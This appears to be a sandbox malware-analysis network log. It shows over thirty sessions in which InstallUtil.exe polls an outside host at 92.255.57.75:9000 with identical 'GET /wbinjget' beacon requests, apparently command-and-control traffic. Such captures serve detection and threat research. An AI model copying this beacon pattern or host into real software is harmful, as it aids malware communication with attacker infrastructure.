Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.11	50087	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:13.950695038 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:15.266681910 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:14 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.11	50088	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:15.500539064 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:16.827100992 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:16 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.11	50089	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:17.095455885 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:18.422693968 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:17 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.11	50090	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:18.654520988 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:19.978497028 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:19 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.11	50091	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:20.231765032 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:21.555603981 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.11	50092	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:21.795082092 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:23.199778080 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:22 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.11	50093	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:23.437238932 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:24.758932114 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:24 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.11	50094	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:24.984603882 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:26.310781002 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:25 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.11	50096	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:26.548110962 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:27.873522043 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.11	50097	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:28.107372999 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:29.431467056 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:28 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.11	50098	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:29.706995964 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:30.998030901 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:30 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.11	50099	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:31.234266043 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:32.560095072 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:31 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.11	50100	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:32.803450108 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:34.128109932 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:33 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.11	50101	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:34.360193014 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:35.695612907 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:35 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.11	50102	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:35.921952963 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:37.312304974 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:36 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.11	50103	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:37.546993971 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:38.873840094 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:38 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.11	50104	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:39.110057116 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:40.436525106 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.11	50105	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:40.675652027 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:42.010498047 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:41 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.11	50106	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:42.250319004 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:43.574310064 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:43 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.11	50108	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:43.812402964 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:45.134697914 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:44 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.11	50110	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:45.414087057 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:46.742137909 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.11	50111	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:46.967900991 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:48.291537046 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:47 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.11	50112	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:48.532449007 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:49.859114885 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:49 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.11	50113	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:50.095398903 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:51.418482065 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.11	50114	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:51.653733015 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:52.979845047 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:52 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.11	50115	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:53.232140064 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:54.586904049 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:53 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.11	50116	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:54.811012983 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:56.247649908 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.11	50117	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:56.482743025 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:57.820609093 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:57 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.11	50119	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:58.048942089 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:41:59.373192072 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:41:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.11	50120	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:41:59.624953032 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:00.936589956 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:00 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.11	50121	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:01.292184114 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:02.626094103 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:01 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.11	50122	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:02.860564947 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:04.197580099 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:03 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.11	50123	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:42:04.436042070 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:42:05.761851072 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:42:04 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
